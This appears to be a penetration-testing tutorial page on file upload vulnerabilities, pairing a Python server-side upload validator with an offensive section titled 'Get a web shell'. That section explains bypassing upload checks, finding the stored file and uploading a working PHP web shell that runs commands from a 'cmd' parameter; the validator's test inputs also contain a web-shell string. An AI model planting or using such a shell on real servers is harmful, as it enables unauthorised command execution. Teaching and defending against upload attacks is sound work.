File Uploads

Look around almost any website and you will find several places where you can upload a file. From profile pictures to GIFs, today's end users can upload a wide range of file types at different submission points around the site. Because of this, file uploads have become an easy-to-find and frequently abused web application feature.

Files are often accepted as opaque binary data and their contents are never inspected. Furthermore, mitigations against this class of attack are frequently partial or missing altogether.

Developers beware: this is an important one to take your time on. Make sure every check is performed at each point in the upload path (name, extension, content, storage location, and how the stored file is served).
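The following validator is an added example written for this page, not code from the original or from any particular framework. It shows the server-side checks the paragraph above calls for: a strict extension allowlist applied to every extension in the name (so a double extension such as shell.php.jpg is caught), a magic-byte check so the content has to match the claimed type, a size limit, a heuristic scan for embedded PHP tags, and a server-chosen random storage name so the uploader never controls the path. The allowlist (images only), the size limit, and the function and class names are assumptions for the example; the file signatures are the standard PNG, JPEG and GIF headers.

```python
import os
import secrets

# Allowlist of accepted extensions mapped to the magic bytes each must start with.
# The image-only allowlist is an assumption for this example; the signatures are
# the standard file headers for these formats.
ALLOWED_TYPES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}

MAX_BYTES = 5 * 1024 * 1024  # constructed limit for the example (5 MiB)


class UploadRejected(ValueError):
    """Raised with a short reason whenever an upload fails a check."""


def validate_upload(filename: str, data: bytes) -> str:
    """Validate an uploaded file and return the random name it should be stored under.

    Raises UploadRejected if any check fails. The caller is expected to write the
    file to a directory outside the web root (or one that is never executed as code).
    """
    # 1. Size checks before any parsing.
    if not data:
        raise UploadRejected("empty file")
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")

    # 2. Never trust the client-supplied path; keep only the base name.
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise UploadRejected("invalid file name")

    # 3. Split on every dot so an inner extension (shell.php.jpg) is visible.
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        raise UploadRejected("missing extension")
    exts = parts[1:]
    # Every extension in the name must be allowlisted, not just the final one.
    for ext in exts:
        if ext not in ALLOWED_TYPES:
            raise UploadRejected(f"extension '.{ext}' not allowed")
    ext = exts[-1]

    # 4. The bytes must actually start with the signature of the claimed type,
    #    so a renamed script with a .jpg extension is rejected.
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not match .{ext}")

    # 5. Heuristic: a valid image header followed by a PHP tag is a polyglot.
    #    This is defence in depth only; storing uploads where they cannot be
    #    executed is the real control.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP tag")

    # 6. Server-chosen random name: the uploader cannot predict or pick the path.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if the upload passes every check."""
    try:
        validate_upload(filename, data)
    except UploadRejected:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample inputs for a quick manual run.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("avatar.png ->", validate_upload("avatar.png", png))
    for name, blob in [
        ("webrce.php", b"<?php system($_REQUEST['cmd']); ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 8),
        ("shell.jpg", b"<?php system($_REQUEST['cmd']); ?>"),
        ("pic.gif", b"GIF89a" + b"<?php echo 1; ?>"),
    ]:
        print(name, "->", "accepted" if is_accepted(name, blob) else "rejected")
```

The returned name is what the application should store the file under; the original file name is kept only as metadata if it is needed at all. Serving the stored file back through a handler that sets the Content-Type from the validated extension, rather than letting the web server execute whatever sits in the upload directory, closes the remaining gap.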

Get a web shell:

A basic file upload like this amazingly still works today, but you may have to play with the request headers, the magic bytes, and the file name and extension to see if you can trick the server into accepting the file. Once you pick your upload spot, try to find where the file is actually stored on the server. Often inspecting the page source will tell you; if not, poke around a bit or run a directory enumeration scan and see if you can find it. Once the location is known, save the code below into a file and upload it to the vulnerable web application.

<?php
    // Minimal PHP web shell: runs whatever is passed in the 'cmd' parameter
    // (GET, POST or cookie, since $_REQUEST covers all three) and returns the output.
    if (isset($_REQUEST['cmd'])){
        $cmd = $_REQUEST['cmd'];
        system($cmd);
    } else {
        echo 'What are you trying to do to me?';
    }
?>

At this point you should be able to execute system commands with: https://yourdomain.site/image/location/webrce.php?cmd=id. This returns the uid and gid of the user your commands run as (the web server's account). From here, check the shells section for how to upgrade your foothold into a full TTY.
